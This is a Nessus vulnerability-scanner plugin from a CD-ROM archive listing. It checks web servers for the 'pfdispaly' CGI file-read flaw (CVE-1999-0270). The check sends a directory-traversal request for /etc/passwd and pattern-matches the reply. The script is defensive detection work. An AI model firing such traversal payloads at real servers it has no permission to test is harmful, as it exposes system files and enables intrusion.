home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pfdipaly.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  81 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10174);
  10.  script_version ("$Revision: 1.21 $");
  11.  script_cve_id("CVE-1999-0270");
  12.  name["english"] = "pfdispaly";
  13.  name["francais"] = "pfdispaly";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "The 'pfdispaly' CGI is installed. This CGI has
  17. a well known security flaw that lets an attacker read arbitrary
  18. files with the privileges of the http daemon (usually root or nobody).
  19.  
  20. Solution : remove it from /cgi-bin.
  21.  
  22. Risk factor : High";
  23.  
  24.  
  25.  desc["francais"] = "Le cgi 'pfdispaly' est installΘ. Celui-ci possΦde
  26. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
  27. lire des fichiers arbitraires au daemon http, avec les privilΦges
  28. de celui-ci (root ou nobody). 
  29.  
  30. Solution : retirez-le de /cgi-bin.
  31.  
  32. Facteur de risque : SΘrieux";
  33.  
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "Checks for the presence of /cgi-bin/pfdispaly";
  38.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/pfdispaly";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl");
  51.  script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58.  
  59. include("http_func.inc");
  60. include("http_keepalive.inc");
  61.  
  62. port = get_http_port(default:80);
  63.  
  64.  
  65. if(!get_port_state(port))exit(0);
  66.  
  67. foreach dir (cgi_dirs())
  68. {
  69. s = http_get(item:string(dir, "/pfdispaly?../../../../../../etc/passwd"), port:port);
  70. r = http_keepalive_send_recv(data:s, port:port);
  71. if(r == NULL)exit(0);
  72.  
  73. if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))security_hole(port);
  74.  
  75. s = http_get(item:string(dir, "/pfdispaly.cgi?../../../../../../etc/passwd"), port:port);
  76. r = http_keepalive_send_recv(data:s, port:port);
  77. if( r == NULL ) exit(0);
  78.  
  79. if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))security_hole(port);
  80. }
  81.